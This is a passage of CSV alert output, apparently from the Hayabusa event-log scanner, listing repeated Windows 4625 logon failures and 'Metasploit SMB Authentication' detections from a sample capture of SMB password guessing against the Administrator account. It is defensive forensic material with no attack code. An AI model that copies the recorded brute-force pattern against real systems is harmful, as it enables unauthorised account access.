Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
